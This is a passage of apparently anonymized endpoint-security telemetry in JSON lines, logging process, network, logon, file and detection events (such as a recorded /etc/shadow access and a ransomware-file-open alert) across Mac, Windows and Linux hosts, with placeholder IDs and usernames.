+{"event_simpleName":"FirmwareAnalysisStatus","ConfigStateHash":"3090255842","FirmwareAnalysisEclControlInterfaceVersion":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","FirmwareAnalysisEclConsumerInterfaceVersion":"0","BootTimeFunctionalityLevel":"255","ReasonOfFunctionalityLevel":"3","CurrentFunctionalityLevel":"2","Entitlements":"15","name":"FirmwareAnalysisStatusMacV2","id":"ffffffff-1111-11eb-ba57-0214a0d89bf7","EffectiveTransmissionClass":"0","aid":"ffffffff0d7b4d839912e55b4755e85b","timestamp":"1625677368429","cid":"ffffffff15754bcfb5f9152ec7ac90ac","PciAttachmentState":"65535"} +{"OutOctets":"0","CreationTimeStamp":"","aip":"67.43.156.13","OutMulticastPkts":"0","InErrors":"0","InterfaceAlias":"utun2","InDiscards":"0","InterfaceIndex":"17","event_platform":"Mac","InterfaceType":"1","id":"ffffffff-1111-11eb-a272-0294ad12fbe7","PhysicalAddressLength":"0","InUcastPkts":"0","EffectiveTransmissionClass":"2","timestamp":"1625677504544","LocalAddressIP4":"67.43.156.14","event_simpleName":"LocalIpAddressIP4","ConfigStateHash":"3090255842","PhysicalAddress":"","OutErrors":"0","InUnknownProtos":"0","OutUcastPkts":"0","InMulticastPkts":"0","ConfigBuild":"1007.4.0013701.1","InOctets":"0","NetLuidIndex":"2","Entitlements":"15","name":"LocalIpAddressIP4MacV1","aid":"ffffffff557f4b99a0afdea9ce8cd6fa","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"CommandLine":"uname -a","ConfigBuild":"1007.8.0009806.1","ConfigStateHash":"4288861242","Entitlements":"15","GID":"0","ImageFileName":"/bin/uname","MD5HashData":"894356eb59e279696c304f07091b7fde","NDRoot":"321385814512398584","ParentProcessId":"321385814512398584","ProcessEndTime":"1604855099.126","ProcessGroupId":"0","ProcessStartTime":"1604855099.126","RGID":"0","RUID":"0","RawProcessId":"51342","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"de80fe0bd06a96543aaec5c634b08cbfc58dba88ea3a66871434a0dd3a9e9dfa","SVGID":"0","SVUID":"0","SessionProcessId":"314116638974342642","SourceProcessId":"321385814512398584","SourceThreadId":"0","TargetProcessId":"321385814512398605","UID":"0","aid":"ffffffff70d140ca9ba97f0dddd14137","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Lin","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-ac87-06decddc17a1","name":"ProcessRollup2LinV5","timestamp":"1604855099681"} +{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ContextProcessId":"317713210176499254","ContextThreadId":"0","ContextTimeStamp":"1604855096.730","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"28987","SHA256HashData":"6de76ab470a16b2a825d223b996d994623473c694c60fccbb71af8691e61c5e0","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"317713210176499254","aid":"ffffffff75fc48f15cfe5f095e605c4c","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-809e-02fff4e55a49","name":"EndOfProcessMacV14","timestamp":"1604855099646"} +{"AllocateVirtualMemoryCount":"0","ArchiveFileWrittenCount":"0","AsepWrittenCount":"0","BinaryExecutableWrittenCount":"0","CLICreationCount":"0","ConHostId":"38188","ConHostProcessId":"3099352216141","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextData":"","ContextProcessId":"3100508103359","ContextThreadId":"93436292950223","ContextTimeStamp":"1604855097.926","CreateProcessCount":"0","CycleTime":"2937514388","DirectoryCreatedCount":"0","DirectoryEnumeratedCount":"1","DnsRequestCount":"0","DocumentFileWrittenCount":"0","EffectiveTransmissionClass":"3","Entitlements":"15","ExeAndServiceCount":"0","ExecutableDeletedCount":"0","ExitCode":"0","FileDeletedCount":"2","GenericFileWrittenCount":"0","ImageSubsystem":"3","InjectedDllCount":"0","InjectedThreadCount":"0","KernelTime":"7500000","MaxThreadCount":"4","ModuleLoadCount":"38","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkConnectCountUdp":"0","NetworkListenCount":"0","NetworkModuleLoadCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","ParentProcessId":"3099350649383","PrivilegedProcessHandleCount":"0","ProcessStartTime":"1604855096.463","ProtectVirtualMemoryCount":"0","QueueApcCount":"0","RawProcessId":"33016","RegKeySecurityDecreasedCount":"0","RemovableDiskFileWrittenCount":"0","RunDllInvocationCount":"0","SHA256HashData":"faceb6f5d1cdc5ad50a4a1b92c4cd3fcdabcf7e8d418014a1b1221c1defa3d8f","ScreenshotsTakenCount":"0","ScriptEngineInvocationCount":"0","ServiceEventCount":"0","SetThreadContextCount":"0","SnapshotFileOpenCount":"0","SuspectStackCount":"0","SuspiciousCredentialModuleLoadCount":"0","SuspiciousDnsRequestCount":"0","SuspiciousFontLoadCount":"0","SuspiciousRawDiskReadCount":"0","TargetProcessId":"3100508103359","UnsignedModuleLoadCount":"0","UserMemoryAllocateExecutableCount":"0","UserMemoryAllocateExecutableRemoteCount":"0","UserMemoryProtectExecutableCount":"0","UserMemoryProtectExecutableRemoteCount":"0","UserSid":"S-1-5-18","UserTime":"6406250","aid":"ffffffffb5db4b2e7ec89aba537adcc2","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-8726-063418e4a9e7","name":"EndOfProcessV15","timestamp":"1604855099935"} +{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0009304.1","ConfigStateHash":"3344040805","ContextProcessId":"311775981885093125","ContextThreadId":"0","ContextTimeStamp":"1604855101.341","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"10507","SHA256HashData":"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"311775981885093125","aid":"ffffffff1aa0482a5ea94f64e08e7b15","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-bc03-065126dd0691","name":"EndOfProcessMacV12","timestamp":"1604855100139"} +{"AuthenticationId":"999","CommandLine":"D:\\projects\\splunk-forwarder\\bin\\splunk-powershell.exe --ps2","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume2\\projects\\splunk-forwarder\\bin\\splunk-powershell.exe","ImageSubsystem":"3","IntegrityLevel":"16384","MD5HashData":"571391f723a439e985a2064337e2802a","ParentAuthenticationId":"999","ParentBaseFileName":"splunkd.exe","ParentProcessId":"17346335177","ProcessCreateFlags":"67634688","ProcessEndTime":"","ProcessParameterFlags":"24577","ProcessStartTime":"1604855099.406","ProcessSxsFlags":"64","RawProcessId":"6116","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"7f326aad0ee45bfef93daede5597d70422d472084ae3295762654fb5021a8720","SessionId":"0","SourceProcessId":"17346335177","SourceThreadId":"107650023406","Tags":"27, 151, 12094627905582, 12094627906234","TargetProcessId":"583707537390","TokenType":"1","UserSid":"S-1-5-18","WindowFlags":"384","aid":"ffffffff3a5a424fa02450da53619745","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-a09e-06f79d630255","name":"ProcessRollup2V17","timestamp":"1604855100030"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2784638081","ContextProcessId":"259090530891","ContextThreadId":"16409623709004","ContextTimeStamp":"1604855095.961","DnsRequestCount":"1","DomainName":"comp1.dom2","DualRequest":"0","EffectiveTransmissionClass":"3","Entitlements":"15","InterfaceIndex":"0","RequestType":"1","aid":"ffffffff4f1444bab96568879cb43556","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"DnsRequest","id":"ffffffff-1111-11eb-8077-0606f7dcf2ed","name":"DnsRequestV3","timestamp":"1604855099913"} +{"ConfigBuild":"1007.8.0009806.1","ConfigStateHash":"4288861242","ContextProcessId":"321385820045701199","ContextThreadId":"0","ContextTimeStamp":"1604855101.645","Entitlements":"15","GID":"0","TargetFileName":"/etc/shadow","UID":"0","UnixMode":"32768","aid":"ffffffff32ba43a483e76c6f0a4aa26f","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Lin","event_simpleName":"CriticalFileAccessed","id":"ffffffff-1111-11eb-b70d-027f9ced2001","name":"CriticalFileAccessedLinV1","timestamp":"1604855102247"} +{"CommandLine":"/usr/bin/plutil -convert xml1 -o - /Applications/Xcode.app/Contents/Developer/Platforms/AppleTVOS.platform/Developer/Library/CoreSimulator/Profiles/Runtimes/tvOS.simruntime/Contents/Resources/RuntimeRoot/System/Library/PrivateFrameworks/DiagnosticExtensions.framework/PlugIns/com.apple.DiagnosticExtensions.CrashLogs.appex/Info.plist","ConfigBuild":"1007.4.0009304.1","ConfigStateHash":"3344040805","Entitlements":"15","GID":"0","ImageFileName":"/usr/bin/plutil","MD5HashData":"d51cef1b288e2032aee9805deff04bfd","MachOSubType":"1","ParentProcessId":"311774817965726568","ProcessEndTime":"","ProcessGroupId":"311774817965726568","ProcessStartTime":"1604855111.240","RGID":"0","RUID":"0","RawProcessId":"10692","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3","SVGID":"0","SVUID":"0","SourceProcessId":"311776004953765502","SourceThreadId":"0","Tags":"27, 12094627905582, 12094627906234","TargetProcessId":"311776004953765502","UID":"0","aid":"ffffffff1aa0482a5ea94f64e08e7b15","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-bc03-065126dd0691","name":"ProcessRollup2MacV3","timestamp":"1604855109180"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3899738370","ContextProcessId":"1546527409909","ContextThreadId":"4711690090889","ContextTimeStamp":"1604855114.133","DesiredAccess":"1180054","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"0","FileIdentifier":"501ee2c32e53fb43b07f419f3236fb45c29e000000002c00","FileObject":"18446655033844205120","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"88080484","ShareAccess":"1","Status":"0","TargetFileName":"\\Device\\HarddiskVolume4\\Windows\\Temp\\__PSScriptPolicyTest_dvkjnbka.apn.ps1","aid":"ffffffff8f1e4b77b4dae5debaa1c8bc","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewScriptWritten","id":"ffffffff-1111-11eb-80b5-06e11a66e03d","name":"NewScriptWrittenV7","timestamp":"1604855114427"} +{"ConfigBuild":"1007.4.0012205.1","ConfigStateHash":"1306766522","ConnectionDirection":"1","ConnectionFlags":"0","ContextProcessId":"321275232072440993","ContextTimeStamp":"1604855116.421","Entitlements":"15","InContext":"0","LocalAddressIP4":"0.0.0.0","LocalPort":"0","Protocol":"6","RemoteAddressIP4":"67.43.156.14","RemotePort":"443","aid":"ffffffffd4094240a6b1d12aaf304f4f","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkConnectIP4","id":"ffffffff-1111-11eb-aca9-02683aed2a0d","name":"NetworkConnectIP4MacV5","timestamp":"1604855116502"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2602391615","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"223442259384","ContextTimeStamp":"1604855116.849","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP4":"67.43.156.14","LocalPort":"53961","Protocol":"6","RemoteAddressIP4":"67.43.156.14","RemotePort":"443","aid":"fffffffff000426eb99afaa2ccdcbc17","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkConnectIP4","id":"ffffffff-1111-11eb-b0eb-06be7616c211","name":"NetworkConnectIP4V5","timestamp":"1604855116942"} +{"AuthenticationId":"6580764513","AuthenticationPackage":"Negotiate","ClientComputerName":"-","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"816054990879","ContextThreadId":"52913017705957","ContextTimeStamp":"1604855091.781","EffectiveTransmissionClass":"2","Entitlements":"15","LogonDomain":"NT AUTHORITY","LogonServer":"","LogonTime":"1604855091.781","LogonType":"9","PasswordLastSet":"","RemoteAccount":"1","UserFlags":"0","UserIsAdmin":"0","UserLogonFlags":"12","UserName":"SYSTEM","UserPrincipal":"user4@dom2","UserSid":"S-1-5-18","aid":"ffffffff8d2e4b4f9b21b40633a8d579","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogon","id":"ffffffff-1111-11eb-a8cf-0649c95cfa1d","name":"UserLogonV8","timestamp":"1604855121077"} +{"AuthenticationId":"2007206396","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"4415814628770","ContextThreadId":"41392001729898","ContextTimeStamp":"1604855120.785","DiskParentDeviceInstanceId":"PCI\\VEN_1000\u0026DEV_0054\u0026SUBSYS_197615AD\u0026REV_01\\4\u00261f16fef7\u00260\u002600A8","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"b57cb59769dfe71180b4806e6f6e6963ea8902000000cb2c","FileObject":"18446708893089967904","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"0","IsTransactedFile":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","SHA256HashData":"d0e1b81f3f3f18256f6447703624019eaee9b1068b3f09323eced4f547cc4182","Size":"6144","TargetFileName":"\\Device\\HarddiskVolume2\\Users\\user10\\AppData\\Local\\Temp\\ec1ijefl.dll","TokenType":"1","aid":"ffffffff2c47454cba360bc404a607bb","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"PeFileWritten","id":"ffffffff-1111-11eb-b091-06f6cca0a049","name":"PeFileWrittenV14","timestamp":"1604855121109"} +{"AuthenticationId":"317005428","AuthenticationPackage":"Negotiate","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3950066843","EffectiveTransmissionClass":"2","Entitlements":"15","LogoffTime":"1604855132.756","LogonDomain":"dom1","LogonServer":"srv2","LogonTime":"1604855131.666","LogonType":"7","PasswordLastSet":"1598119332.510","RemoteAccount":"1","UserFlags":"32","UserIsAdmin":"0","UserLogoffType":"3","UserLogonFlags":"0","UserName":"user4","UserPrincipal":"user.name@dom2.com","UserSid":"S-1-5-21-606747145-1364589140-725345543-28636","aid":"ffffffffe0104823bd3de859d5bc8bc7","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogoff","id":"ffffffff-1111-11eb-8913-0287fd11c79b","name":"UserLogoffV3","timestamp":"1604855134461"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"537307300","ContextProcessId":"635780922149","ContextThreadId":"9479299143023","ContextTimeStamp":"1604855025.966","DesiredAccess":"1180054","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"128","FileIdentifier":"0e02a8c7ed9d244887cef0409af0e6190030000000001100","FileObject":"18446695174291796544","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"83886176","ShareAccess":"3","Status":"0","TargetFileName":"\\Device\\HarddiskVolume4\\Program Files\\Snow Software\\Inventory\\Agent\\cloudmeteringhost.exe","aid":"ffffffff425942f58382dbb11350eeda","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewExecutableWritten","id":"ffffffff-1111-11eb-93cb-067deb43537b","name":"NewExecutableWrittenV1","timestamp":"1604855149643"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ConnectionDirection":"2","ConnectionFlags":"0","ContextProcessId":"50714198593318","ContextThreadId":"194302491825207","ContextTimeStamp":"1604855150.066","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP4":"127.0.0.1","LocalPort":"59491","Protocol":"6","RemoteAddressIP4":"0.0.0.0","RemotePort":"0","aid":"ffffffffa51b4acf9dbc1fc273e6145c","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkListenIP4","id":"ffffffff-1111-11eb-8726-063418e4a9e7","name":"NetworkListenIP4V5","timestamp":"1604855150545"} +{"ClientComputerName":"com1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"7073822473144","ContextThreadId":"48689911139327","ContextTimeStamp":"1604855152.993","EffectiveTransmissionClass":"2","Entitlements":"15","EtwRawProcessId":"744","EtwRawThreadId":"5304","LogonDomain":"BROADCAST","LogonType":"3","RemoteAddressIP4":"67.43.156.14","Status":"3221225581","SubStatus":"3221225578","UserName":"user5","aid":"ffffffffd8844a59acce5e1f4ad01888","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogonFailed2","id":"ffffffff-1111-11eb-a8aa-067029dffccb","name":"UserLogonFailed2V2","timestamp":"1604855154274"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextProcessId":"1838383212125","ContextThreadId":"27242382481217","ContextTimeStamp":"1604855151.534","EffectiveTransmissionClass":"3","Entitlements":"15","FileIdentifier":"b0754a8f86feffffb0754a8f86feffff09764a8f86feffff","FileObject":"18446636884348143072","IrpFlags":"1028","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Program Files\\WindowsApps\\Deleted\\Microsoft.Getstarted_9.10.32461.0_x64__8wekyb3d8bbweacf6b996-01b3-402c-bd01-a67529f94699\\clrcompression.dll","aid":"ffffffff4a0946365161093453e596d4","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ExecutableDeleted","id":"ffffffff-1111-11eb-b23b-064dea059649","name":"ExecutableDeletedV3","timestamp":"1604855154670"} +{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0009202.1","ConfigStateHash":"230795414","ContextProcessId":"318137549555284836","ContextThreadId":"0","ContextTimeStamp":"1604855135.209","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"20195","SHA256HashData":"295fbc2356e8605e804f95cb6d6f992335e247dbf11767fe8781e2a7f889978a","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"318137549555284836","aid":"ffffffffcfe84e8c6a52c4001bd83761","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-ae31-065d76bec0c3","name":"EndOfProcessMacV11","timestamp":"1604855160047"} +{"ApiReturnValue":"1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"683078218537","ContextTimeStamp":"1604855171.731","EffectiveTransmissionClass":"3","Entitlements":"15","EtwRawProcessId":"19400","EtwRawThreadId":"9384","aid":"ffffffff80984ea8b49d9a53f590c566","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"RegisterRawInputDevicesEtw","id":"ffffffff-1111-11eb-a570-0685ba2a382f","name":"RegisterRawInputDevicesEtwV1","timestamp":"1604855173077"} +{"CompletionEventId":"Event_ChannelDataDownloadCompleteV1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","DownloadPath":"metahash+/cfs/channelfiles/0000000013/b2acba1a30a3407dae27d0503611022d/C-00000013-00000000-00000408.sys","DownloadPort":"443","DownloadServer":"lfodown01-b.cloudsink.net","EffectiveTransmissionClass":"0","Entitlements":"15","TargetFileName":"C-00000013-00000000-00000408.sys","aid":"ffffffffffc94c645268f64fc900213f","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"LFODownloadConfirmation","id":"ffffffff-1111-11eb-8ab5-0643392fc75d","name":"LFODownloadConfirmationV1","timestamp":"1604855174018"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1763245019","ContextProcessId":"2071361595421","ContextThreadId":"41650430047375","ContextTimeStamp":"1604855146.590","EffectiveTransmissionClass":"3","Entitlements":"15","FileIdentifier":"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00","FileObject":"18446622606546437424","IrpFlags":"395312","MajorFunction":"6","MinorFunction":"0","NewFileIdentifier":"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00","OperationFlags":"0","SourceFileName":"\\Device\\HarddiskVolume3\\Windows\\assembly\\temp\\EKA0UARWWK\\Microsoft.WSMan.Management.ni.dll","TargetFileName":"\\Device\\HarddiskVolume3\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.We0722664#\\c2579d00f9849413b8b7948dd00ac863\\Microsoft.WSMan.Management.ni.dll","aid":"ffffffff280b41b956a91e816bd9b9b0","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewExecutableRenamed","id":"ffffffff-1111-11eb-8162-0663305b686f","name":"NewExecutableRenamedV6","timestamp":"1604855177513"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"402097454","ContextProcessId":"66601077523","ContextThreadId":"2500785639062","ContextTimeStamp":"1604855165.213","DesiredAccess":"1048577","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"128","FileIdentifier":"d2f4250ff1ba3b4ca66e123c5269884ca6f8020000002700","FileObject":"18446641334185168032","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"35668001","ShareAccess":"3","Status":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Windows\\CbsTemp\\30848497_1904507751\\FodWU","aid":"ffffffff2c9f4066b0b5f2f00265503c","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"DirectoryCreate","id":"ffffffff-1111-11eb-9411-06b7c99be087","name":"DirectoryCreateV1","timestamp":"1604855180332"} +{"AuthenticationId":"999","CommandLine":"C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s wlidsvc","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextTimeStamp":"1604855196.468","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\svchost.exe","InterfaceGuid":"367ABB81-9844-35F1-AD32-98F038001003","InterfaceVersion":"131072","RpcClientProcessId":"949196415400","RpcClientThreadId":"44209361549673","RpcNestingLevel":"0","RpcOpNum":"19","ServiceDisplayName":"wlidsvc","TargetProcessId":"955370934902","TokenType":"1","UserName":"user6","aid":"fffffffffcc4413057adc260e99b0774","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ServiceStarted","id":"ffffffff-1111-11eb-9c98-02c501fe7d81","name":"ServiceStartedV2","timestamp":"1604855196635"} +{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"203564169","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"319255017313886870","ContextTimeStamp":"1604855200.751","Entitlements":"15","InContext":"0","LocalAddressIP6":"0:0:0:0:0:0:0:0","LocalPort":"0","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:1","RemotePort":"2181","aid":"ffffffffed0f41575620ab9fb25ce105","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkConnectIP6","id":"ffffffff-1111-11eb-81f1-061cdebbd115","name":"NetworkConnectIP6MacV5","timestamp":"1604855200836"} +{"AuthenticationId":"1656178821","AuthenticationPackage":"Kerberos","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"30254389526587","ContextThreadId":"275230771323179","EffectiveTransmissionClass":"2","Entitlements":"15","LogonDomain":"dom1","LogonId":"1656178821","LogonServer":"srv1","LogonTime":"1604855211.249","LogonType":"5","PasswordLastSet":"1530626210.104","RemoteAccount":"1","SessionId":"0","UserCanonical":"","UserFlags":"32","UserIsAdmin":"0","UserLogonFlags":"0","UserName":"user7","UserPrincipal":"user7@dom4.cm","UserSid":"S-1-5-21-606747145-1364589140-725345543-183372","aid":"ffffffff73164cfa9656c4caff8a2a38","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserIdentity","id":"ffffffff-1111-11eb-86e3-02db1faa1327","name":"UserIdentityV2","timestamp":"1604855212031"} +{"AuthenticationId":"999","CommandLine":"C:\\WINDOWS\\System32\\svchost.exe -k netsvcs -p -s NetSetupSvc","ConfigBuild":"1007.3.0010609.1","ConfigStateHash":"4193986770","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\svchost.exe","ImageSubsystem":"2","IntegrityLevel":"16384","MD5HashData":"8a0a29438052faed8a2532da50455756","ParentAuthenticationId":"999","ParentProcessId":"2881931477041","ProcessCreateFlags":"525324","ProcessEndTime":"","ProcessParameterFlags":"8193","ProcessStartTime":"1604842733.215","ProcessSxsFlags":"64","RawProcessId":"6160","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6","SessionId":"0","SourceProcessId":"2881931477041","SourceThreadId":"70316664105336","Tags":"27, 29, 53, 54, 55, 185, 10445360464024, 10445360464025, 10445360464026, 10445360464258, 10445360464273, 10445360464274, 12094627905582, 12094627906234, 211655988347297","TargetProcessId":"2882232404222","TokenType":"2","UserSid":"S-1-5-18","WindowFlags":"128","aid":"ffffffffbe8a46386afe80c5ef64d0b5","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-b4f9-06e3a7e5503b","name":"ProcessRollup2V16","timestamp":"1604855237946"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1763245019","ContextProcessId":"1016182570608","ContextThreadId":"37343520154472","ContextTimeStamp":"1604829512.519","DesiredAccess":"1179785","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"0","FileIdentifier":"7a9c1c1610045d45a54bd6643ac12ea767a5020000000c00","FileObject":"18446670458156489088","Information":"1","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"16777312","ShareAccess":"5","Status":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Users\\user11\\Downloads\\file.pptx","aid":"ffffffffac4148947ed68497e89f3308","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"RansomwareOpenFile","id":"ffffffff-1111-11eb-9756-06fe7f8f682f","name":"RansomwareOpenFileV4","timestamp":"1604855242091"} +{"AllocateVirtualMemoryCount":"0","ArchiveFileWrittenCount":"0","AsepWrittenCount":"0","BinaryExecutableWrittenCount":"0","CLICreationCount":"0","ConHostId":"13532","ConHostProcessId":"1731198143955","ConfigBuild":"1007.3.0010609.1","ConfigStateHash":"2030177841","ContextData":"","ContextProcessId":"1741732942772","ContextThreadId":"28523520529271","ContextTimeStamp":"1604855274.377","CycleTime":"473618996","DirectoryCreatedCount":"0","DirectoryEnumeratedCount":"0","DnsRequestCount":"0","DocumentFileWrittenCount":"0","EffectiveTransmissionClass":"3","Entitlements":"15","ExeAndServiceCount":"0","ExecutableDeletedCount":"0","ExitCode":"0","FileDeletedCount":"0","GenericFileWrittenCount":"0","ImageSubsystem":"2","InjectedDllCount":"0","InjectedThreadCount":"0","KernelTime":"1406250","MaxThreadCount":"16","ModuleLoadCount":"72","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkConnectCountUdp":"0","NetworkListenCount":"0","NetworkModuleLoadCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","ParentProcessId":"1731198143955","PrivilegedProcessHandleCount":"0","ProcessStartTime":"1604855154.465","ProtectVirtualMemoryCount":"0","QueueApcCount":"0","RawProcessId":"18176","R